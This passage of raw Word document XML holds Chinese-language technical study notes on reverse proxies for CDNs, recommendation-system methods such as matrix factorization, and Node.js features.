      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Reverse Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>）方式是指以</w:t>
      </w:r>
      <w:hyperlink r:id="rId225" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>代理服务器</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来接受</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>上的连接请求，然后将请求转发给内部网络上的服务器，并将从服务器上得到的结果返回给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>上请求连接的客户端，此时代理服务器对外就表现为一个节点服务器。通过部署更多的反向代理服务器，来达到实现多节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F4213B" w:rsidRPr="00F41A4C" w:rsidRDefault="00F4213B" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB00F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB00F6" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85C7A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D85C7A" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85C7A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D85C7A" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85C7A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D85C7A" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85C7A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D85C7A" w:rsidP="00CB00F6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D219F" w:rsidRPr="00F41A4C" w:rsidRDefault="00493BD6" w:rsidP="002B1880">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>4.2</w:t>
      </w:r>
      <w:r w:rsidR="000D219F" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000D219F" w:rsidRPr="00F41A4C">
        <w:t>推荐系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D219F" w:rsidRPr="00F41A4C" w:rsidRDefault="004027C9" w:rsidP="000D219F">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="004027C9" w:rsidP="004027C9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协同过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="004027C9" w:rsidP="004027C9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关联规则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004027C9" w:rsidRPr="00F41A4C" w:rsidRDefault="00EA1CB5" w:rsidP="004027C9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>矩阵分解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B423E" w:rsidRPr="00F41A4C" w:rsidRDefault="007E3492" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>冷启动问题：用户、物品、系统冷启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F116E5" w:rsidRPr="00F41A4C" w:rsidRDefault="00F116E5" w:rsidP="00F116E5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如何预测缺失的评分呢？对于缺失的评分，可以转化为基于机器学习的回归问题，也就是连续值的预测，对于矩阵分解有如下式子，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是类似图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的评分矩阵，假设</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>N*M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>维</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示行数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表示列数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，可以分解为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跟</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵维度</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>N*K</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> P</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵维度</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K*M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F116E5" w:rsidRPr="00F41A4C" w:rsidRDefault="00F116E5" w:rsidP="00F116E5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>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       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>P,Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵的解释，直观上，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个用户对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个主题的关系，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>矩阵是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个主题跟</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个物品的关系，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B242A" w:rsidRPr="00F41A4C" w:rsidRDefault="004B242A" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00493BD6" w:rsidP="002B1880">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00CD234F" w:rsidRPr="00F41A4C">
        <w:t>.3  nodejs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00881C9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nodejs</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>作为一个新兴的后台语言，有很多吸引人的地方：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>事件驱动、非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，适用数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(I/O)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>密集型应用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>单线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD234F" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD234F" w:rsidP="00CD234F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3) Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不新增额外线程</w:t>
      </w:r>
